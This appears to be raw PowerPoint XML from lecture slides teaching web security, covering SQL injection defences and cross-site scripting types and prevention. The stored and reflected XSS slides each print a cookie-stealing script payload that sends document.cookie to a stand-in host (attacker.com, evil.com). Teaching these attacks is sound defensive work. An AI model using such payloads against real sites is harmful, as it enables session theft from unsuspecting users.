              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg1">
                  <a:lumMod val="65000"/>
                </a:schemeClr>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Prepared Statement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>distinction between control and data in queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set the length limitation for each value in the form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g. username cannot be more than 8 characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="11430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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{362DAF0A-3008-0848-AD9B-CCAEF6ED760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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3846848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(Cross-site scripting)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540327" y="2187036"/>
            <a:ext cx="8184573" cy="4079294"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Cross-site scripting attacks are the common in the code injection attacks. It allows attackers to inject the script (client-side) into web pages, which are viewed by other users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>The most common type of XSS attacks are as follows</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Stored XSS attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Reflected XSS attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E21D56EC-164E-1543-A14A-5E12EF849F6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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="512382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XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="484909" y="2038256"/>
            <a:ext cx="8239991" cy="4228073"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Attacker stores attacking code in a web server and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2200" dirty="0"/>
              <a:t>various </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>victim users triggers the attack by browsing the page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Assume the attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" u="sng" dirty="0"/>
              <a:t>put the comment in the news website</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t> as follows:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="표 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1217221" y="4152292"/>
          <a:ext cx="7010400" cy="2011680"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7010400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1504896">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>This</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t> article was so interesting..</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Courier"/>
                        <a:cs typeface="Courier"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>img</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t> style="</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>display:none</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>" id="</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>cookieMonster</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>"&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>&lt;script&gt;</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>img</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t> = </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>document.getElementById</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>("</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>cookieMonster</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>");</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>img.src</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t> = "http://</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>attacker.com?cookie</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>=" +</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>      </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>encodeURIComponent</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>document.cookie</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>);</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>&lt;/script&gt;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Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F5B4C25-0D38-4948-8CDB-42407872528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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="46276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XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="471055" y="2343626"/>
            <a:ext cx="8010145" cy="2512532"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Attacker could craft user input which actually contains evil client-side code such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>The malicious code will be baked into a hyperlink that is presented to the end-user. This link might be delivered to victims via another route, such as in an e-mail message, or on some other web server.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="표 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1470800" y="5035463"/>
          <a:ext cx="7010400" cy="1361026"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7010400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="1361026">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr latinLnBrk="1"/>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="2000" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>http://</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>www.google.com</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>search?keyword</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>=&lt;script&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>document.images</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>[0].</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>src</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>="http://</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>evil.com</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>steal?cookie</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>="+  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0" err="1">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>document.cookie</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>;&lt;script&gt;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Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB6D094B-A26F-0944-9CC9-52155829C2CD}"/>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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2390689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prevent the XSS attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864382" y="2489199"/>
            <a:ext cx="7559182" cy="3828473"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Here are several solutions for the web developers to prevent the XSS attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When the developers implement the code, they should implement the filtering code for all input (from user) to remove potentially harmful characters, or the character that can convert them easily (e.g. &gt; to &lt;)  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web developers  disable the scripting code as an input in their browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Please have a look at the XSS Prevention Cheat Sheet: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1400" u="sng" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>www.owasp.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" u="sng" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>index.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" u="sng" dirty="0"/>
              <a:t>/XSS_(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>Cross_Site_Scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" u="sng" dirty="0"/>
              <a:t>)_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" u="sng" dirty="0" err="1"/>
              <a:t>Prevention_Cheat_Sheet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20B41229-2D40-CC4A-86BA-EEE7D58D531D}"/>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35</a:t>
            </a:fld>
